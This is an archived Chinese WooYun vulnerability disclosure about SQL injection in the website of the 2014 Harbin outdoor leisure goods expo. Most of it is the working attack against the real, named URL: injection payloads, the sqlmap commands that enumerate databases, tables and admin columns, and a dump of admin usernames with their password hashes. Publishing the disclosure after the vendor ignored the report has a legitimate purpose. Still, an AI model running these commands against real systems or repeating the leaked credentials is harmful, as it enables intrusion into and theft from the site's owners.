乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-19: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-07-03: 厂商已经主动忽略漏洞,细节向公众公开
看我如何"四步"拿下2014哈尔滨户外休闲用品博览会数据库
MYSQL注入导致数据库泄露- -.注入地址:
http://www.olpe.cn/dy_show.php?tid=4&aid=22&id=62
---Place: GETParameter: tid Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: tid=4 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6b6b6a3a,0x6d587449516a77654d49,0x3a676d7a3a)#&aid=22&id=62 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: tid=4 AND SLEEP(5)&aid=22&id=62---
./sqlmap.py -u "http://www.olpe.cn/dy_show.php?tid=4&aid=22&id=62" --dbs
available databases [3]: [*] information_schema[*] olpecn[*] test
./sqlmap.py -u "http://www.olpe.cn/dy_show.php?tid=4&aid=22&id=62" -D olpecn --tables
[22 tables]+----------------+| admanager || admin || adtype || bigtype || city || comment || goodsattribute || goodsattrvalue || goodsorder || grzl || infoclass || infoflag || infolist || mail_config || member || message || province || userip || webconfig || weblink || weblinktype || wenjuan |+----------------+
./sqlmap.py -u "http://www.olpe.cn/dy_show.php?tid=4&aid=22&id=62" -D olpecn -T admin --columns
[8 columns]+------------+----------------------+| Column | Type |+------------+----------------------+| checkadmin | enum('true','false') || id | int(10) unsigned || levelarray | varchar(255) || levelname | char(30) || loginip | varchar(20) || logintime | char(20) || password | char(32) || username | char(30) |+------------+----------------------+
./sqlmap.py -u "http://www.olpe.cn/dy_show.php?tid=4&aid=22&id=62" -D olpecn -T admin -C username,password --dump
[2 entries]+---------------+----------------------------------+| username | password |+---------------+----------------------------------+| zhongshen | a004c0bec4c5fcc51114a27b4895236a || zhongshenkeji | 594104dc8420b4bbc5b2cfd292ed92e9 |+---------------+----------------------------------+
:)
未能联系到厂商或者厂商积极拒绝